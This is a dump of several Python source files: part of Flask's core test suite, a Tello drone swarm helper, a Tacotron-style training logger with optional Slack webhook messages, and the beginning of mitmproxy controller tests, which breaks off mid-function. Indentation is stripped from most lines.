cookie = rv.headers['set-cookie'].lower()
assert 'domain=.example.com' in cookie
assert 'path=/' in cookie
assert 'secure' in cookie
assert 'httponly' not in cookie
def test_missing_session():
app = flask.Flask(__name__)
def expect_exception(f, *args, **kwargs):
try:
f(*args, **kwargs)
except RuntimeError as e:
assert e.args and 'session is unavailable' in e.args[0]
else:
assert False, 'expected exception'
with app.test_request_context():
assert flask.session.get('missing_key') is None
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration():
permanent = True
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return text_type(flask.session.permanent)
client = app.test_client()
rv = client.get('/')
assert 'set-cookie' in rv.headers
    match = re.search(r'(?i)\bexpires=([^;]+)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get('/test')
assert rv.data == b'True'
permanent = False
rv = app.test_client().get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
assert match is None
def test_session_stored_last():
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
c = app.test_client()
assert c.get('/').data == b'None'
assert c.get('/').data == b'42'
def test_session_special_types():
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.after_request
def modify_session(response):
flask.session['m'] = flask.Markup('Hello!')
flask.session['u'] = the_uuid
flask.session['dt'] = now
flask.session['b'] = b'\xff'
flask.session['t'] = (1, 2, 3)
return response
@app.route('/')
def dump_session_contents():
return pickle.dumps(dict(flask.session))
c = app.test_client()
c.get('/')
rv = pickle.loads(c.get('/').data)
assert rv['m'] == flask.Markup('Hello!')
assert type(rv['m']) == flask.Markup
assert rv['dt'] == now
assert rv['u'] == the_uuid
assert rv['b'] == b'\xff'
assert type(rv['b']) == bytes
assert rv['t'] == (1, 2, 3)
def test_session_cookie_setting():
app = flask.Flask(__name__)
app.testing = True
app.secret_key = 'dev key'
is_permanent = True
@app.route('/bump')
def bump():
rv = flask.session['foo'] = flask.session.get('foo', 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route('/read')
def read():
return str(flask.session.get('foo', 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get('/bump').data == b'1'
assert c.get('/bump').data == b'2'
assert c.get('/bump').data == b'3'
rv = c.get('/read')
set_cookie = rv.headers.get('set-cookie')
assert (set_cookie is not None) == expect_header
assert rv.data == b'3'
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=True)
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
def test_flashes():
app = flask.Flask(__name__)
app.secret_key = 'testkey'
with app.test_request_context():
assert not flask.session.modified
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ['Zap', 'Zip']
def test_extended_flashing():
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
app = flask.Flask(__name__)
app.secret_key = 'testkey'
app.testing = True
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u'Hello World',
u'Hello World',
flask.Markup(u'<em>Testing</em>')
]
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
('message', u'Hello World'),
('error', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(
category_filter=['message'], with_categories=True)
assert list(messages) == [('message', u'Hello World')]
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'], with_categories=True)
assert list(messages) == [
('message', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'])
assert len(messages) == 2
assert messages[0] == u'Hello World'
assert messages[1] == flask.Markup(u'<em>Testing</em>')
return ''
    # Create a new test client for each check so previously flashed messages
    # are cleared.
c = app.test_client()
c.get('/')
c.get('/test/')
c = app.test_client()
c.get('/')
c.get('/test_with_categories/')
c = app.test_client()
c.get('/')
c.get('/test_filter/')
c = app.test_client()
c.get('/')
c.get('/test_filters/')
c = app.test_client()
c.get('/')
c.get('/test_filters_without_returning_categories/')
def test_request_processing():
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += b'|after'
evts.append('after')
return response
@app.route('/')
def index():
assert 'before' in evts
assert 'after' not in evts
return 'request'
assert 'after' not in evts
rv = app.test_client().get('/').data
assert 'after' in evts
assert rv == b'request|after'
def test_request_preprocessing_early_return():
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route('/')
def index():
evts.append('index')
return "damnit"
rv = app.test_client().get('/').data.strip()
assert rv == b'hello'
assert evts == [1, 2]
def test_after_request_processing():
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
c = app.test_client()
resp = c.get('/')
assert resp.status_code == 200
assert resp.headers['X-Foo'] == 'a header'
def test_teardown_request_handler():
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode():
called = []
app = flask.Flask(__name__)
app.testing = True
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_error():
called = []
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route('/')
def fails():
1 // 0
rv = app.test_client().get('/')
assert rv.status_code == 500
assert b'Internal Server Error' in rv.data
assert len(called) == 2
def test_before_after_request_order():
called = []
app = flask.Flask(__name__)
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = app.test_client().get('/')
assert rv.data == b'42'
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling():
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.errorhandler(Forbidden)
def forbidden(e):
return 'forbidden', 403
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
@app.route('/forbidden')
def error2():
flask.abort(403)
c = app.test_client()
rv = c.get('/')
assert rv.status_code == 404
assert rv.data == b'not found'
rv = c.get('/error')
assert rv.status_code == 500
assert b'internal server error' == rv.data
rv = c.get('/forbidden')
assert rv.status_code == 403
assert b'forbidden' == rv.data
def test_before_request_and_routing_errors():
app = flask.Flask(__name__)
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = app.test_client().get('/')
assert rv.status_code == 404
assert rv.data == b'value'
def test_user_error_handling():
class MyException(Exception):
pass
app = flask.Flask(__name__)
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return '42'
@app.route('/')
def index():
raise MyException()
c = app.test_client()
assert c.get('/').data == b'42'
def test_http_error_subclass_handling():
class ForbiddenSubclass(Forbidden):
pass
app = flask.Flask(__name__)
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return 'banana'
@app.errorhandler(403)
    def handle_forbidden(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return 'apple'
@app.route('/1')
def index1():
raise ForbiddenSubclass()
@app.route('/2')
def index2():
flask.abort(403)
@app.route('/3')
def index3():
raise Forbidden()
c = app.test_client()
assert c.get('/1').data == b'banana'
assert c.get('/2').data == b'apple'
assert c.get('/3').data == b'apple'
def test_trapping_of_bad_request_key_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route('/fail')
def fail():
flask.request.form['missing_key']
c = app.test_client()
assert c.get('/fail').status_code == 400
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
c = app.test_client()
try:
c.get('/fail')
except KeyError as e:
assert isinstance(e, BadRequest)
else:
assert False, 'Expected exception'
def test_trapping_of_all_http_exceptions():
app = flask.Flask(__name__)
app.testing = True
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
c = app.test_client()
with pytest.raises(NotFound):
c.get('/fail')
def test_enctype_debug_helper():
from flask.debughelpers import DebugFilesKeyError
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
    # The with statement is important: otherwise we would leave an exception
    # on the stack, which could negatively affect other tests.
with app.test_client() as c:
try:
c.post('/fail', data={'foo': 'index.txt'})
except DebugFilesKeyError as e:
assert 'no file contents were transmitted' in str(e)
assert 'This was submitted: "index.txt"' in str(e)
else:
assert False, 'Expected exception'
def test_response_creation():
app = flask.Flask(__name__)
@app.route('/unicode')
def from_unicode():
return u'Hällo Wörld'
@app.route('/string')
def from_string():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/args')
def from_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/two_args')
def from_two_args_tuple():
return 'Hello', {
'X-Foo': 'Test',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/args_status')
def from_status_tuple():
return 'Hi, status!', 400
@app.route('/args_header')
def from_response_instance_status_tuple():
return flask.Response('Hello world', 404), {
"X-Foo": "Bar",
"X-Bar": "Foo"
}
c = app.test_client()
assert c.get('/unicode').data == u'Hällo Wörld'.encode('utf-8')
assert c.get('/string').data == u'Hällo Wörld'.encode('utf-8')
rv = c.get('/args')
assert rv.data == b'Meh'
assert rv.headers['X-Foo'] == 'Testing'
assert rv.status_code == 400
assert rv.mimetype == 'text/plain'
rv2 = c.get('/two_args')
assert rv2.data == b'Hello'
assert rv2.headers['X-Foo'] == 'Test'
assert rv2.status_code == 200
assert rv2.mimetype == 'text/plain'
rv3 = c.get('/args_status')
assert rv3.data == b'Hi, status!'
assert rv3.status_code == 400
assert rv3.mimetype == 'text/html'
rv4 = c.get('/args_header')
assert rv4.data == b'Hello world'
assert rv4.headers['X-Foo'] == 'Bar'
assert rv4.headers['X-Bar'] == 'Foo'
assert rv4.status_code == 404
def test_make_response():
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response('Awesome')
assert rv.status_code == 200
assert rv.data == b'Awesome'
assert rv.mimetype == 'text/html'
rv = flask.make_response('W00t', 404)
assert rv.status_code == 404
assert rv.data == b'W00t'
assert rv.mimetype == 'text/html'
def test_make_response_with_response_instance():
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
assert rv.status_code == 400
assert rv.data == b'{\n "msg": "W00t"\n}\n'
assert rv.mimetype == 'application/json'
rv = flask.make_response(
flask.Response(''), 400)
assert rv.status_code == 400
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
assert rv.status_code == 400
assert rv.headers['Content-Type'] == 'text/html'
assert rv.headers['X-Foo'] == 'bar'
def test_jsonify_no_prettyprint():
app = flask.Flask(__name__)
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
with app.test_request_context():
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {
"msg": {
"submsg": "W00t"
},
"msg2": "foobar"
}
rv = flask.make_response(
flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint():
app = flask.Flask(__name__)
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
with app.test_request_context():
compressed_msg = {"msg":{"submsg":"W00t"},"msg2":"foobar"}
pretty_response =\
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
rv = flask.make_response(
flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_url_generation():
app = flask.Flask(__name__)
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
with app.test_request_context():
assert flask.url_for('hello', name='test x') == '/hello/test%20x'
assert flask.url_for('hello', name='test x', _external=True) == \
'http://localhost/hello/test%20x'
def test_build_error_handler():
app = flask.Flask(__name__)
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError as err:
error = err
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
pytest.raises(
BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for('spam') == '/test_handler/'
def test_custom_converters():
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app = flask.Flask(__name__)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
c = app.test_client()
assert c.get('/1,2,3').data == b'1|2|3'
def test_static_files():
app = flask.Flask(__name__)
app.testing = True
rv = app.test_client().get('/static/index.html')
assert rv.status_code == 200
assert rv.data.strip() == b'<h1>Hello World!</h1>'
with app.test_request_context():
assert flask.url_for('static', filename='index.html') == \
'/static/index.html'
rv.close()
def test_none_response():
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def test():
return None
try:
app.test_client().get('/')
except ValueError as e:
        assert str(e) == 'View function did not return a response'
    else:
        assert False, 'Expected ValueError'
def test_request_locals():
assert repr(flask.g) == '<LocalProxy unbound>'
assert not flask.g
def test_test_app_proper_environ():
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return 'Foo'
@app.route('/', subdomain='foo')
def subdomain():
return 'Foo SubDomain'
rv = app.test_client().get('/')
assert rv.data == b'Foo'
rv = app.test_client().get('/', 'http://localhost.localdomain:5000')
assert rv.data == b'Foo'
rv = app.test_client().get('/', 'https://localhost.localdomain:5000')
assert rv.data == b'Foo'
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'https://localhost.localdomain')
assert rv.data == b'Foo'
try:
app.config.update(SERVER_NAME='localhost.localdomain:443')
rv = app.test_client().get('/', 'https://localhost.localdomain')
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain:443') does not match the "
"server name from the WSGI environment ('localhost.localdomain')"
)
try:
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'http://foo.localhost')
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain') does not match the "
"server name from the WSGI environment ('foo.localhost')"
)
rv = app.test_client().get('/', 'http://foo.localhost.localdomain')
assert rv.data == b'Foo SubDomain'
def test_exception_propagation():
def apprunner(config_key):
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.route('/')
def index():
1 // 0
c = app.test_client()
if config_key is not None:
app.config[config_key] = True
try:
c.get('/')
except Exception:
pass
else:
assert False, 'expected exception'
else:
assert c.get('/').status_code == 500
    # We have to run this test in an isolated thread because if the
    # debug flag is set to true and an exception happens, the context is
    # not torn down. This causes other tests that run after this one to
    # fail when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
def test_max_content_length():
app = flask.Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
assert False
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
assert False
@app.errorhandler(413)
def catcher(error):
return '42'
c = app.test_client()
rv = c.post('/accept', data={'myfile': 'foo' * 100})
assert rv.data == b'42'
def test_url_processors():
app = flask.Flask(__name__)
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
c = app.test_client()
assert c.get('/de/').data == b'/de/about'
assert c.get('/de/about').data == b'/foo'
assert c.get('/foo').data == b'/en/about'
def test_inject_blueprint_url_defaults():
app = flask.Flask(__name__)
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
assert values == expected
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
assert url == expected
def test_nonascii_pathinfo():
app = flask.Flask(__name__)
app.testing = True
@app.route(u'/киртест')
def index():
return 'Hello World!'
c = app.test_client()
rv = c.get(u'/киртест')
assert rv.data == b'Hello World!'
def test_debug_mode_complains_after_first_request():
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'Awesome'
assert not app.got_first_request
assert app.test_client().get('/').data == b'Awesome'
try:
@app.route('/foo')
def broken():
return 'Meh'
except AssertionError as e:
assert 'A setup function was called' in str(e)
else:
assert False, 'Expected exception'
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
assert app.test_client().get('/foo').data == b'Meh'
assert app.got_first_request
def test_before_first_request_functions():
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
got.append(42)
c = app.test_client()
c.get('/')
assert got == [42]
c.get('/')
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent():
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
c = app.test_client()
def get_and_assert():
c.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging():
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with app.test_client() as c:
try:
c.post('/foo', data={})
except AssertionError as e:
assert 'http://localhost/foo/' in str(e)
assert ('Make sure to directly send '
'your POST-request to this URL') in str(e)
else:
assert False, 'Expected exception'
rv = c.get('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
app.debug = False
with app.test_client() as c:
rv = c.post('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
def test_route_decorator_custom_endpoint():
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
c = app.test_client()
assert c.get('/foo/').data == b'foo'
assert c.get('/bar/').data == b'bar'
assert c.get('/bar/123').data == b'123'
def test_preserve_only_once():
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail')
def fail_func():
1 // 0
c = app.test_client()
for x in range(3):
with pytest.raises(ZeroDivisionError):
c.get('/fail')
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception():
app = flask.Flask(__name__)
app.debug = True
errors = []
@app.route('/fail')
def fail_func():
1 // 0
@app.route('/success')
def success_func():
return 'Okay'
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
c = app.test_client()
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
c.get('/fail')
assert errors == []
# But this request triggers it, and it's an error
c.get('/success')
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
    # At this point another request has no preserved error to flush; its
    # teardown handler just records None.
c.get('/success')
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g():
app = flask.Flask(__name__)
app.testing = True
with app.app_context():
assert flask.g.get('x') is None
assert flask.g.get('x', 11) == 11
flask.g.x = 42
assert flask.g.get('x') == 42
assert flask.g.x == 42
def test_g_iteration_protocol():
app = flask.Flask(__name__)
app.testing = True
with app.app_context():
flask.g.foo = 23
flask.g.bar = 42
assert 'foo' in flask.g
assert 'foos' not in flask.g
assert sorted(flask.g) == ['bar', 'foo']
def test_subdomain_basic_support():
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
c = app.test_client()
rv = c.get('/', 'http://localhost/')
assert rv.data == b'normal index'
rv = c.get('/', 'http://test.localhost/')
assert rv.data == b'test index'
def test_subdomain_matching():
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost/')
assert rv.data == b'index for mitsuhiko'
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost:3000'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost:3000/')
assert rv.data == b'index for mitsuhiko'
def test_multi_route_rules():
app = flask.Flask(__name__)
@app.route('/')
@app.route('/<test>/')
def index(test='a'):
return test
rv = app.test_client().open('/')
assert rv.data == b'a'
rv = app.test_client().open('/b/')
assert rv.data == b'b'
def test_multi_route_class_views():
class View(object):
def __init__(self, app):
app.add_url_rule('/', 'index', self.index)
app.add_url_rule('/<test>/', 'index', self.index)
def index(self, test='a'):
return test
app = flask.Flask(__name__)
_ = View(app)
rv = app.test_client().open('/')
assert rv.data == b'a'
rv = app.test_client().open('/b/')
assert rv.data == b'b'
def test_run_defaults(monkeypatch):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv['result'] = 'running...'
app = flask.Flask(__name__)
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.run()
assert rv['result'] == 'running...'
def test_run_server_port(monkeypatch):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv['result'] = 'running on %s:%s ...' % (hostname, port)
app = flask.Flask(__name__)
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
hostname, port = 'localhost', 8000
app.run(hostname, port, debug=True)
assert rv['result'] == 'running on %s:%s ...' % (hostname, port)
|
swarm.py
|
from .tello import Tello
from threading import Thread, Barrier
from queue import Queue
class TelloSwarm:
@staticmethod
def fromFile(path, enable_exceptions=True):
with open(path, "r") as fd:
ips = fd.readlines()
return TelloSwarm.fromIps(ips, enable_exceptions)
@staticmethod
def fromIps(ips, enable_exceptions=True):
if len(ips) == 0:
raise Exception("No ips provided")
tellos = []
for ip in ips:
tellos.append(Tello(
host=ip.strip(),
enable_exceptions=enable_exceptions
))
return TelloSwarm(tellos)
def __init__(self, tellos):
self.tellos = tellos
self.barrier = Barrier(len(tellos))
self.funcBarrier = Barrier(len(tellos) + 1)
self.funcQueues = [Queue() for tello in tellos]
        def worker(i):
            queue = self.funcQueues[i]
            tello = self.tellos[i]
            while True:
                func = queue.get()
                # First barrier: wait until parallel() has queued a function
                # for every drone, so all drones start together.
                self.funcBarrier.wait()
                func(i, tello)
                # Second barrier: signal parallel() that this drone is done.
                self.funcBarrier.wait()
self.threads = []
for i, tello in enumerate(tellos):
thread = Thread(target=worker, daemon=True, args=(i,))
thread.start()
self.threads.append(thread)
def sequential(self, func):
for i, tello in enumerate(self.tellos):
func(i, tello)
    def parallel(self, func):
        # Run func(i, tello) on every drone at once (one worker thread per
        # drone) and block until all of them have finished.
        for queue in self.funcQueues:
            queue.put(func)
        self.funcBarrier.wait()  # release all workers simultaneously
        self.funcBarrier.wait()  # wait until every worker is done
def sync(self, timeout=None):
return self.barrier.wait(timeout)
def __getattr__(self, attr):
def callAll(*args, **kwargs):
self.parallel(lambda i, tello: getattr(tello, attr)(*args, **kwargs))
return callAll
def __iter__(self):
return iter(self.tellos)
def __len__(self):
return len(self.tellos)
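# Minimal usage sketch (illustrative only): the IP addresses below are
# hypothetical, and connect/takeoff/land/move_up are assumed to be methods
# of the Tello class; unknown attributes are forwarded to every drone in
# parallel via __getattr__ above.
if __name__ == '__main__':
    swarm = TelloSwarm.fromIps(['192.168.10.1', '192.168.10.2'])
    swarm.connect()
    swarm.takeoff()
    # Per-drone behaviour: give each drone a task that depends on its index.
    swarm.parallel(lambda i, tello: tello.move_up(25 + i * 25))
    swarm.land()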
|
infolog.py
|
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
_file.flush()
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
_file.flush()
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
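# A minimal usage sketch (filename and run name are assumptions): init() opens
# the log file and writes the run header, log() mirrors a message to stdout and
# the file, and slack=True additionally posts it to the configured webhook on a
# background thread (skipped here since no slack_url is given).
if __name__ == '__main__':
    init('train.log', 'demo-run')
    log('step 100: loss=0.123')
    log('training finished', slack=True)  # no Slack post: _slack_url is None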
|
test_controller.py
|
from threading import Thread, Event
from unittest.mock import Mock
from mitmproxy import controller
import queue
from mitmproxy.exceptions import Kill, ControlException
from mitmproxy import proxy
from mitmproxy import master
from mitmproxy.test import tutils
class TMsg:
pass
class TestMaster:
def test_simple(self):
class DummyMaster(master.Master):
@controller.handler
def log(self, _):
m.should_exit.set()
def tick(self, timeout):
# Speed up test
super().tick(0)
m = DummyMaster(None, proxy.DummyServer(None))
assert not m.should_exit.is_set()
msg = TMsg()
msg.reply = controller.DummyReply()
m.event_queue.put(("log", msg))
m.run()
assert m.should_exit.is_set()
def test_server_simple(self):
m = master.Master(None, proxy.DummyServer(None))
m.start()
m.shutdown()
m.start()
m.shutdown()
class TestServerThread:
def test_simple(self):
m = Mock()
t = master.ServerThread(m)
t.run()
assert m.serve_forever.called
class TestChannel:
def test_tell(self):
q = queue.Queue()
channel = controller.Channel(q, Event())
m = Mock(name="test_tell")
channel.tell("test", m)
assert q.get() == ("test", m)
assert m.reply
def test_ask_simple(self):
